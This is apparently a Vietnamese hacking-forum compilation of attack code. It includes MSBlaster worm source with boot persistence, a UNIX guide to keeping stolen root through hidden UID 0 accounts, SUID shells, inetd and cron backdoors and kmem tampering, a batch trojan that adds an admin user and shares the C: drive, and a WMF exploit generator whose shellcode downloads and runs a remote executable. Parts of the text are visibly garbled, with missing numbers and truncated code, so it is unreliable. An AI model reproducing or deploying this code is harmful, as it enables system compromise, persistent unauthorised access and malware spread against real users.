ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ Ä
Virus MSBlaster Source Code
Cái nì
Assemble
mừ save dạng
.vbs
you
excluding
COMMAND.COM
Không biết phải không ta
Quote:
Coded by: Azagoth
;
-; Assemble using Turbo Assembler:
; tasm /m2 <filename>.asm
; tlink /t <filename>.obj
;
-; - Non-Overwriting COM infector (excluding COMMAND.COM)
; - COM growth: XXX bytes
; - It searches the current directory for uninfected files If none are
; found, it searches previous directory until it reaches root and no more
; uninfected files are found (One infection per run)
; - Also infects read-only files
; - Restores attributes, initial date/time-stamps, and original path.
; -
Muốn lấy nì nè
Quote:
/* global variables*/char Filename[SOME_CONST];DWORD i_ip_A;DWORD
i_ip_B;DWORD i_ip_C;DWORD i_ip_D;DWORD i_ip_D_?;/* Deliberately left blank
This function listens on ports 69 and 135 for incoming connections It then tries to spread
itself It might have spread faster had it done a progressive network scan.*/void
spreadworm(){}/* Deliberately left blank Was designed to a DoS attack on
(28)attacking windowsupdate.microsoft.com or microsoft.com for real entertainment
value.*/SEC_THREAD_START payload(){}// mainint main(){ in_addr in; DWORD
temp_ip_buf; hostent _hostent; char local_ip_address[0x200], month[3],
day_of_month[3]; LPWSADATA WSAData; HKEY hKey; DWORD ThreadId; bool
status; /* Registry Key manipulation We create the key if it doesn't exist, otherwise it is
opened Then we give the value "msblast.exe" to the key "windows auto update"
Windows Auto Update is now set to run on boot up, which will run MSBlast.exe */
RegCreateKeyExA(0x80000002,
"SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run ", 0, 0, 0, 0xf003f, 0, & hKey,
0); RegSetValueExA(hKey, "windows auto update", 0, 1, "msblast.exe", 0x32);
RegCloseKey(hKey); /* Check to see if an instance of MSBlast.exe is already running, if
there is one running then this instance exits */ CreateMutexA(0, 1, "BILLY"); if
(GetLastError() == 0xb7) ExitProcess(0); if ((WSAStartup(0x202, & WSAData) != 0) ||
(WSAStartup(0x101, & WSAData) != 0) || (WSAStartup(0x001, & WSAData) != 0))
return -1; /* We need to know where MSBlast.exe is located so that we can redistribute it.
*/ GetModuleFileNameA(0, &Filename, 0x104); /* Idle Event We wait for a connection
to the internet to be established before we can proceed */ while
(InternetGetConnectedState(& ThreadId, 0) == 0) Sleep(0x4e20); /* Generate Random IP
Address */ i_ip_D = 0; srand(GetTickCount()); randomip_A = rand() % 0xFE;
randomip_A++; randomip_B = rand() % 0xFE; /* Get Host Machine IP */ if
(gethostname(& local_ip_address, 0x200) != ffffffff) { _hostent = gethostbyname(&
local_ip_address); if (_hostent != 0) { if (_hostent.hlength != 0) { memcpy( &in,
&_hostent.hlength, 4); sprintf(&local_ip_address, "%s", inet_ntoa(in.S_un));
temp_ip_buf = strtok(&local_ip_address, "."); /* Split ip address into A.B.C.(D) */
i_ip_A = atoi(temp_ip_buf); temp_ip_buf = strtok(0, "."); i_ip_B = atoi(temp_ip_buf);
temp_ip_buf = strtok(0, "."); i_ip_C = atoi(temp_ip_buf); if (i_ip_C > 0x14)
{ srand(GetTickCount()); i_ip_C -= rand() % 0x14; } /* Don't use Random IP Addresses
*/ randomip_A = i_ip_A; randomip_B = i_ip_B; status = true; } } }
srand(GetTickCount()); if ((rand() % 0x14) < 12) status = 0; i_ip_D_? = 1; if ((rand %
0xA) > 7) i_ip_D_? = 2; if (status == 0) { i_ip_A = rand() % 0xFE; i_ip_A++; i_ip_B =
rand() % 0xFE; i_ip_C = rand() % 0xFE; } /* Get Date */ GetDateFormatA(0x409, 0, 0,
&"d", &day_of_month, 3); GetDateFormatA(0x409, 0, 0, &"M", &month, 3); /* Payload.
Run payload() if the date is right ??? */ if ( (atoi(& day_of_month) > 15) || (atoi(& month)
> 8) ) CreateThread(0, 0, payload, 0, 0, &ThreadId); /* Spreadworm */ while (1)
spreadworm(); /* Sense of Humour The remainder of the code will never get executed */
WSACleanup(); return 0;}
Làm vài Backdoor chơi
Sau hướng dẫn viết Backdoor cọp py mạng Dốt
tiếng anh nên không dám dịch Sợ dịch sai khơng thấy backdoor đâu mà lại
chết > Có bác siêu English dịch dùm nhá
(29)Ok You've been at it for all night Trying all the exploits you can think of The system seems tight The system looks tight
The system *is* tight You've tried everything Default passwds, guessable passwds, NIS weaknesses, NFS holes, incorrect
permissions, race conditions, SUID exploits, Sendmail bugs, and so on Nothing WAIT! What's that!?!? A "#" ???? Finally!
After seeming endless toiling, you've managed to steal root Now what? How you hold onto this precious super-user
privilege you have worked so hard to achieve ?
This article is intended to show you how to hold onto root once you have it It is intended for hackers and administrators alike
From a hacking perspective, it is obvious what good this paper will you Admin's can likewise benefit from this paper Ever
wonder how that pesky hacker always manages to pop up, even when you think you've completely eradicated him from your
system?
This list is BY NO MEANS comprehensive There are as many ways to leave backdoors into a UNIX computer as there are
ways into one Beforehand
Know the location of critical system files This should be obvious (If you can't list any of the top of your head, stop reading
now, get a book on UNIX, read it, then come back to me ) Familiarity with passwd file formats (including general field
format, system specific naming conventions, shadowing mechanisms, etc ) Know vi Many systems will not have those
robust, user-friendly editors such as Pico and Emacs Vi is also quite useful for needing to quickly seach and edit a large file If
you are connecting remotely (via dial-up/telnet/rlogin/whatver) it's always nice to have a robust terminal program that has a
nice, FAT scrollback buffer This will come in handy if you want to cut and paste code, rc files, shell scripts, etc
The permenance of these backdoors will depend completely on the technical saavy of the administrator The experienced and
skilled administrator will be wise to many (if not all) of these backdoors But, if you have managed to steal root, it is likely the admin isn't as skilled (or up to date on bug reports) as she should be, and many of these doors may be in place for some time
to come One major thing to be aware of, is the fact that if you can cover you tracks during the initial break-in, no one will be
looking for back doors
The Overt
[1] Add a UID account to the passwd file This is probably the most obvious and quickly discovered method of rentry It
(30)prepend or append it Anyone causally examining the passwd file will see this So, why not stick it in the middle
#!/bin/csh
# Inserts a UID account into the middle of the passwd file
# There is likely a way to this in 1/2 a line of AWK or SED Oh well
# daemon9@netcom.com
set linecount = `wc -l /etc/passwd`
cd # Do this at home cp /etc/passwd /temppass # Safety first echo passwd file has $linecount[1] lines
@ linecount[1] /=
@ linecount[1] += # we only want temp files echo Creating two files, $linecount[1] lines each \(or approximately that\)
split -$linecount[1] /temppass # passwd string optional echo "EvilUser::0:0:Mr Sinister:/home/sweet/home:/bin/csh" >> /xaa cat /xab >> /xaa
mv /xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand rm /xa* /temppass
echo Done
NEVER, EVER, change the root password The reasons are obvious
[2] In a similar vein, enable a disabled account as UID 0, such as Sync Or, perhaps, an account somwhere buried deep in the
passwd file has been abandoned, and disabled by the sysadmin Change her UID to (and remove the '*' from the second
field)
[3] Leave an SUID root shell in /tmp #!/bin/sh
# Everyone's favorite
cp /bin/csh /tmp/.evilnaughtyshell # Don't name it that chmod 4755 /tmp/.evilnaughtyshell
Many systems run cron jobs to clean /tmp nightly Most systems clean /tmp upon a reboot Many systems have /tmp mounted
to disallow SUID programs from executing You can change all of these, but if the filesystem starts filling up, people may
notice but, hey, this *is* the overt section ) I will not detail the changes neccessary because they can be quite system
specific Check out /var/spool/cron/crontabs/root and /etc/fstab
The Veiled
(31)background info: The Internet daemon (/etc/inetd) listens for connection requests on TCP and UDP ports and spawns the
appropriate program (usally a server) when a connection request arrives The format of the /etc/inetd.conf file is simple Typical
lines look like this:
(1) (2) (3) (4) (5) (6) (7) ftp stream tcp nowait root /usr/etc/ftpd ftpd talk dgram udp wait root /usr/etc/ntalkd ntalkd
Field (1) is the daemon name that should appear in /etc/services This tells inetd what to look for in /etc/services to determine
which port it should associate the program name with (2) tells inetd which type of socket connection the daemon will expect
TCP uses streams, and UDP uses datagrams Field (3) is the protocol field which is either of the two transport protocols, TCP
or UDP Field (4) specifies whether or not the daemon is iterative or concurrent A 'wait' flag indicates that the server will
process a connection and make all subsequent connections wait 'Nowait' means the server will accept a connection, spawn a
child process to handle the connection, and then go back to sleep, waiting for further connections Field (5) is the user (or more
inportantly, the UID) that the daemon is run as (6) is the program to run when a connection arrives, and (7) is the actual
command (and optional arguments) If the program is trivial (usally requiring no user interaction) inetd may handle it internally
This is done with an 'internal' flag in fields (6) and (7)
So, to install a handy backdoor, choose a service that is not used often, and replace the daemon that would normally handle it
with something else A program that creates an SUID root shell, a program that adds a root account for you in the /etc/passwd
file, etc
For the insinuation-impaired, try this:
Open the /etc/inetd.conf in an available editor Find the line that reads:
daytime stream tcp nowait root internal and change it to:
daytime stream tcp nowait /bin/sh sh -i
You now need to restart /etc/inetd so it will reread the config file It is up to you how you want to this You can kill and
restart the process, (kill -9 , /usr/sbin/inetd or /usr/etc/inetd) which will interuppt ALL network connections (so it is a good idea
to this off peak hours)
[5] An option to compromising a well known service would be to install a new one, that runs a program of your choice One
(32)/etc/services as well as in /etc/inetd.conf The format of the /etc/services file is simple:
(1) (2)/(3) (4) smtp 25/tcp mail
Field (1) is the service, field (2) is the port number, (3) is the protocol type the service expects, and (4) is the common name
associated with the service For instance, add this line to /etc/services:
evil 22/tcp evil and this line to /etc/inetd.conf:
evil stream tcp nowait /bin/sh sh -i Restart inetd as before
Note: Potentially, these are a VERY powerful backdoors They not only offer local rentry from any account on the system,
they offer rentry from *any* account on *any* computer on the Internet [6] Cron-based trojan I Cron is a wonderful system administration tool It is also a wonderful tool for backdoors, since root's
crontab will, well, run as root Again, depending on the level of experience of the sysadmin (and the implementation), this
backdoor may or may not last /var/spool/cron/crontabs/root is where root's list for crontabs is usally located Here, you have
several options I will list a only few, as cron-based backdoors are only limited by your imagination Cron is the clock daemon
It is a tool for automatically executing commands at specified dates and times Crontab is the command used to add, remove,
or view your crontab entries It is just as easy to manually edit the /var/spool/crontab/root file as it is to use crontab A crontab
entry has six fields:
(1) (2) (3) (4) (5) (6)
* * /usr/bin/updatedb
Fields (1)-(5) are as follows: minute (0-59), hour (0-23), day of the month (1-31) month of the year (1-12), day of the week
(0-6) Field (6) is the command (or shell script) to execute The above shell script is executed on Mondays To exploit cron,
simply add an entry into /var/spool/crontab/root For example: You can have a cronjob that will run daily and look in the
/etc/passwd file for the UID account we previously added, and add him if he is missing, or nothing otherwise (it may not
be a bad idea to actually *insert* this shell code into an already installed crontab entry shell script, to further obfuscate your shady intentions) Add this line to /var/spool/crontab/root:
(33)#!/bin/csh
# Is our eviluser still on the system? Let's make sure he is #daemon9@netcom.com
set evilflag = (`grep eviluser /etc/passwd`)
if($#evilflag == 0) then # Is he there?
set linecount = `wc -l /etc/passwd`
cd # Do this at home cp /etc/passwd /temppass # Safety first @ linecount[1] /=
@ linecount[1] += # we only want temp files
split -$linecount[1] /temppass # passwd string optional echo "EvilUser::0:0:Mr Sinister:/home/sweet/home:/bin/csh" >> /xaa
cat /xab >> /xaa mv /xaa /etc/passwd
chmod 644 /etc/passwd # or whatever it was beforehand
rm /xa* /temppass echo Done
else endif
[7] Cron-based trojan II This one was brought to my attention by our very own Mr Zippy For this, you need a copy of the
/etc/passwd file hidden somewhere In this hidden passwd file (call it /var/spool/mail/.sneaky) we have but one entry, a root
account with a passwd of your choosing We run a cronjob that will, every morning at 2:30am (or every other morning), save a
copy of the real /etc/passwd file, and install this trojan one as the real /etc/passwd file for one minute (synchronize swatches!)
Any normal user or process trying to login or access the /etc/passwd file would get an error, but one minute later, everything
would be ok Add this line to root's crontab file: 29 * * * /bin/usr/sneakysneaky_passwd
make sure this exists:
#echo "root:1234567890123:0:0:Operator:/:/bin/csh" > /var/spool/mail/.sneaky
and this is the simple shell script: #!/bin/csh
(34)cp /etc/passwd /etc/.temppass
cp /var/spool/mail/.sneaky /etc/passwd sleep 60
mv /etc/.temppass /etc/passwd
[8] Compiled code trojan Simple idea Instead of a shell script, have some nice C code to obfuscate the effects Here it is
Make sure it runs as root Name it something innocous Hide it well /* A little trojan to create an SUID root shell, if the proper argument is
given C code, rather than shell to hide obvious it's effects */ /* daemon9@netcom.com */
#include
#define KEYWORD "industry3" #define BUFFERSIZE 10 int main(argc, argv) int argc;
char *argv[];{ int i=0;
if(argv[1]){ /* we've got an argument, is it the keyword? */
if(!(strcmp(KEYWORD,argv[1]))){
/* This is the trojan part */ system("cp /bin/csh /bin/.swp121"); system("chown root /bin/.swp121"); system("chmod 4755 /bin/.swp121"); }
}
/* Put your possibly system specific trojan
messages here */
/* Let's look like we're doing something */
printf("Sychronizing bitmap image records.");
/* system("ls -alR / >& /dev/null > /dev/null&"); */ for(;i<10;i++){
fprintf(stderr,"."); sleep(1);
}
printf("\nDone.\n"); return(0);
} /* End main */
[9] The sendmail aliases file The sendmail aliases file allows for mail sent to a particular username to either expand to several
(35)"decode: "|/usr/bin/uudecode"
to the /etc/aliases file Usally, you would then create a uuencoded rhosts file with the full pathname embedded
#! /bin/csh
# Create our rhosts file Note this will output to stdout echo "+ +" > tmpfile
/usr/bin/uuencode tmpfile /root/.rhosts
Next telnet to the desired site, port 25 Simply fakemail to decode and use as the subject body, the uuencoded version of the
.rhosts file For a one liner (not faked, however) this:
%echo "+ +" | /usr/bin/uuencode /root/.rhosts | mail decode@target.com You can be as creative as you wish in this case You can setup an alias that, when mailed to, will run a program of your
choosing Many of the previous scripts and methods can be employed here
The Covert
[10] Trojan code in common programs This is a rather sneaky method that is really only detectable by programs such tripwire
The idea is simple: insert trojan code in the source of a commonly used program Some of most useful programs to us in this
case are su, login and passwd because they already run SUID root, and need no permission modification Below are some
general examples of what you would want to do, after obtaining the correct sourcecode for the particular flavor of UNIX you
are backdooring (Note: This may not always be possible, as some UNIX vendors are not so generous with thier sourcecode.)
Since the code is very lengthy and different for many flavors, I will just include basic psuedo-code:
get input;
if input is special hardcoded flag, spawn evil trojan; else if input is valid, continue;
else quit with error;
Not complex or difficult Trojans of this nature can be done in less than 10 lines of additional code
The Esoteric
(36)to modify the memory of the machine to change the UID of your processes To so requires that /dev/kmem have read/write
permission The following steps are executed: Open the /dev/kmem device, seek to your page in memory, overwrite the UID of
your current process, then spawn a csh, which will inherit this UID The following program does just that
/* If /kmem is is readable and writable, this program will change the user's
UID and GID to */
/* This code originally appeared in "UNIX security: A practical tutorial"
with some modifications by daemon9@netcom.com */ #include
#include #include #include #include #include #include
#define KEYWORD "nomenclature1" struct user userpage;
long address(), userlocation; int main(argc, argv, envp) int argc;
char *argv[], *envp[];{ int count, fd;
long where, lseek();
if(argv[1]){ /* we've got an argument, is it the keyword? */
if(!(strcmp(KEYWORD,argv[1]))){
fd=(open("/dev/kmem",O_RDWR); if(fd<0){
printf("Cannot read or write to /dev/kmem\n");
perror(argv); exit(10); }
userlocation=address();
where=(lseek(fd,userlocation,0);
if(where!=userlocation){
printf("Cannot seek to user page\n"); perror(argv);
(37)count=read(fd,&userpage,sizeof(struct user));
if(count!=sizeof(struct user)){
printf("Cannot read user page\n"); perror(argv);
exit(30); }
printf("Current UID: %d\n",userpage.u_ruid); printf("Current GID: %d\n",userpage.g_ruid);
userpage.u_ruid=0; userpage.u_rgid=0;
where=lseek(fd,userlocation,0); if(where!=userlocation){
printf("Cannot seek to user page\n"); perror(argv);
exit(40); }
write(fd,&userpage,((char *)&(userpage.u_procp))-((char *)&userpage));
execle("/bin/csh","/bin/csh","-i",(char *)0, envp);
} }
} /* End main */ #include
#include #include
#define LNULL ((LDFILE *)0) long address(){
LDFILE *object; SYMENT symbol; long idx=0;
object=ldopen("/unix",LNULL); if(!object){
fprintf(stderr,"Cannot open /unix.\n"); exit(50);
}
(38)ldclose(object);
return(symbol.n_value); }
}
fprintf(stderr,"Cannot read symbol table in /unix.\n"); exit(60);
}
[12] Since the previous code requires /dev/kmem to be world accessable, and this is not likely a natural event, we need to take
care of this My advice is to write a shell script similar to the one in [7] that will change the permissions on /dev/kmem for a
discrete amount of time (say minutes) and then restore the original permissions You can add this source to the source in [7]:
chmod 666 /dev/kmem
sleep 300 # Nap for minutes
chmod 600 /dev/kmem # Or whatever it was before
From The Infinity Concept Issue II
Tự làm "con trojan"
- Starting
-
-:Server:-Mục đích share ổ C tạo user với quyền admin
Bước 1:
Mở dos prompt notebook.
Dos prompt để ta kiểm tra command chuẩn chưa
notebook để ta tạo file bat
Mở notebook đánh dòng lệnh sau:
Lệnh 1-> net user abc /add
(tạo user có tên abc )
Lệnh 2-> net localgroup administrators abc /add
Add user group
Lệnh 3->net share system=C:\ /unlimited
Share ổ C
(39)Lệnh 4-> net send ipcuaminh hello !
Khi mở file bat có mess gửi đến máy
mình biết IP được
Xem ip dùng lệnh : ipconfig
-: Client
: -Sau tên bạn ta mở file bat, ta type lệnh sau
máy
1 -> net use \\victim_ip abc
2-> explorer \\victimip\system
-Ai rảnh test xem Cái vui vẻ thui ko hoanh tráng nên ai
thấy ngứa đừng chửi nhé, công ra
Cách tạo File WMF gắn vào web ! 0-Day exploit
Code:
/* \
/ WMF nDay download() Exploit Generator \ by Unl0ck Research Team
/ \
/ greetz:
rst/ghc { ed, uf0, fost },
uKt { choix, nekd0, payhash, antq }, blacksecurity { #black } ,
0x557 { kaka, swan, sam, nolife }, sowhat, tty64 { izik };
This sploit is now full shit, so kiddies party has been started!!! urs,
darkeagle \
/ */
#include <stdio.h> #include <winsock2.h>
(40)#define PROC_BEGIN asm _emit 0x90 asm _emit 0x90\
asm _emit 0x90 asm _emit 0x90\
asm _emit 0x90 asm _emit 0x90\
asm _emit 0x90 asm _emit 0x90 #define PROC_END PROC_BEGIN
#define SEARCH_STR "\x90\x90\x90\x90\x90\x90\x90\x90\x90" #define SEARCH_LEN #define MAX_SC_LEN 2048 #define HASH_KEY 13 // Define Decode Parameter
#define DECODE_LEN 21 #define SC_LEN_OFFSET #define ENC_KEY_OFFSET 11 #define ENC_KEY 0xff // Define Function Addr
#define ADDR_LoadLibraryA [esi] #define ADDR_GetSystemDirectoryA [esi+4] #define ADDR_WinExec [esi+8] #define ADDR_ExitProcess [esi+12] #define ADDR_URLDownloadToFileA [esi+16] // Need functions
unsigned char functions[100][128] =
{ // [esi] stack layout // kernel32 // 00 kernel32.dll {"LoadLibraryA"}, // [esi]
{"GetSystemDirectoryA"}, // [esi+4] {"WinExec"}, // [esi+8] {"ExitProcess"}, // [esi+12] // urlmon // 01 urlmon.dll {"URLDownloadToFileA"}, // [esi+16] {""},
};
//q dài pót tượng trưng thơi
//
jmp sc_end
sc_start:
(41)// Get kernel32.dll base addr
mov eax, fs:0x30 // PEB
mov eax, [eax+0x0c] // PROCESS_MODULE_INFO mov esi, [eax+0x1c] // InInitOrder.flink
lodsd // eax = InInitOrder.blink mov ebp, [eax+8] // ebp = kernel32.dll base address
mov esi, edi // Hash string start addr -> esi
// Get function addr of kernel32 push
pop ecx getkernel32:
call GetProcAddress_fun loop getkernel32
// Get function addr of urlmon push 0x00006e6f
push 0x6d6c7275 // urlmon push esp
call ADDR_LoadLibraryA // LoadLibraryA("urlmon"); mov ebp, eax // ebp = urlmon.dll base address
/*
push pop ecx geturlmon:
call GetProcAddress_fun loop geturlmon
*/
call GetProcAddress_fun // url start addr = edi LGetSystemDirectoryA:
sub esp, 0x20 mov ebx, esp push 0x20 push ebx
call ADDR_GetSystemDirectoryA // GetSystemDirectoryA LURLDownloadToFileA:
// eax = system path size
// URLDownloadToFileA url save to a.exe
mov dword ptr [ebx+eax], 0x652E555C // "\U.e" mov dword ptr [ebx+eax+0x4], 0x00006578 // "xe" xor eax, eax
(42)push eax
push ebx // %systemdir%\U.exe push edi // url
push eax
call ADDR_URLDownloadToFileA // URLDownloadToFileA //LWinExec:
mov ebx, esp
push 1//executes in SW_SHOW, push if you wanna in SW_HIDE
push ebx
call ADDR_WinExec // WinExec(%systemdir %\a.exe);
Finished:
//push
call ADDR_ExitProcess // ExitProcess(); GetProcAddress_fun:
push ecx push esi
mov esi, [ebp+0x3C] // e_lfanew
mov esi, [esi+ebp+0x78] // ExportDirectory RVA add esi, ebp // rva2va
push esi
mov esi, [esi+0x20] // AddressOfNames RVA add esi, ebp // rva2va
xor ecx, ecx dec ecx find_start: inc ecx lodsd
add eax, ebp xor ebx, ebx hash_loop:
movsx edx, byte ptr [eax] cmp dl, dh
jz short find_addr
ror ebx, HASH_KEY // hash key add ebx, edx
inc eax
jmp short hash_loop find_addr:
cmp ebx, [edi] // compare to hash jnz short find_start
pop esi // ExportDirectory
mov ebx, [esi+0x24] // AddressOfNameOrdinals RVA add ebx, ebp // rva2va
mov cx, [ebx+ecx*2] // FunctionOrdinal
(43)mov eax, [ebx+ecx*4] // FunctionAddress RVA add eax, ebp // rva2va
stosd // function address save to [edi]
pop esi pop ecx ret
sc_end:
call sc_start
PROC_END //C macro to end proc }